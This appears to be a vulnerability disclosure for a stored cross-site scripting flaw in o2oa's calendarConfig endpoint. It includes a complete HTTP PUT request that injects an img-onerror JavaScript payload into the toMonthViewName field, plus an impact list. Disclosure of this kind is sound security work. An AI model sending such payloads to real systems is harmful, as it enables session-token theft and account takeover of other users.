Stored XSS in /x_organization_assemble_personal/jaxrs/definition/calendarConfig in o2oa ≤ 10.0-410-g3d5e0d2

Summary

In o2oa versions up to 10.0-410-g3d5e0d2, the /x_organization_assemble_personal/jaxrs/definition/calendarConfig endpoint is vulnerable to a stored cross-site scripting (XSS) attack. A malicious user can inject arbitrary JavaScript code into the application by setting the toMonthViewName field, which is later rendered without proper sanitization.

Exploitation

Send a crafted request to /x_organization_assemble_personal/jaxrs/definition/calendarConfig with a malicious payload in the toMonthViewName field.

PUT /x_organization_assemble_personal/jaxrs/definition/calendarConfig?v=develop-10.0-410-3d5e0d2 HTTP/1.1
Host: localhost
Cookie: x-token=Wrr7kmtfAdHix4JgERWhu-K6ZlusjUyzvPAekU6E6zc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Authorization: Wrr7kmtfAdHix4JgERWhu-K6ZlusjUyzvPAekU6E6zc
Sec-Fetch-Site: same-origin
Referer: http://localhost/x_desktop/index.html
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Content-Type: application/json; charset=UTF-8
Accept-Language: zh-CN
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Accept: text/html,application/json,*/*
Origin: http://localhost
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Content-Length: 154

{"weekBegin":"0","disableViewList":[],"toMonthViewName":"\"><img src=1 onerror=alert('hacker')>","toWeekViewName":"","toDayViewName":"","toListViewName":""}

When the affected calendar view is opened, the stored payload is executed, confirming the XSS.

Impact

• Persistent execution of attacker-controlled JavaScript in the victim’s browser

• Theft of session tokens, user credentials, or other sensitive data

• Ability to perform actions on behalf of victims, leading to account compromise and privilege escalation